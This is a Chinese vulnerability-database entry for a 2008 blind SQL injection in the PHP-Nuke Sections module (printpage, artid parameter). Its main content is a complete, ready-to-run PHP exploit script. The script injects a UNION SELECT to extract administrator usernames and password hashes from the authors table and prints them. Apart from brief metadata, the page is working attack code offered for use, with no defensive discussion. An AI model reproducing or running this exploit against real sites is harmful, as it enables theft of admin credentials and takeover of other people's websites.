php-nuke 8.0 module sections artid blind sql inj vuln.

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052316 漏洞类型
发布时间 2008-12-31 更新时间 2008-12-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008120057
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 <?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);
echo '
+=========================================================+
|PHP-NUKE Module Sections printpage artid Sql inj Vuln.
|&#304;MHAT&#304;M&#304;.ORG BugBUSTER Team. |
+=========================================================+
<+> version <8.0
<+> Tested on 7.9 & 6.0
';

if ($argc < 2){
print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}


/* Ac&#305;klama */
if (empty($argv[3])){ $prefix = 'nuke';} #Prefix girin.
else {$prefix = $argv[3];}

switch ($argv[2]){
case "6":
$query ="modules.php?name=Sections&op=printpage&artid=99999+union+select+aid,pwd+from+".$prefix."_authors";
$version = 6;
break;
default:
$query ="modules.php?name=Sections&op=printpage&artid=99999'+union+select+aid,pwd+from+".$prefix."_authors";
$version = 7;
break;
}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Hashs.: ".$matches[0];
if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
else {echo "Basar&#305;s&#305;z(Exploit Failed)...";}

credits();


function credits(){
print "\n\n+========================================+\n\r Coded By dumenci \n\r Copyright (c) BugBUSTERs";
print "\n\r+========================================+\n";
exit;
}

?>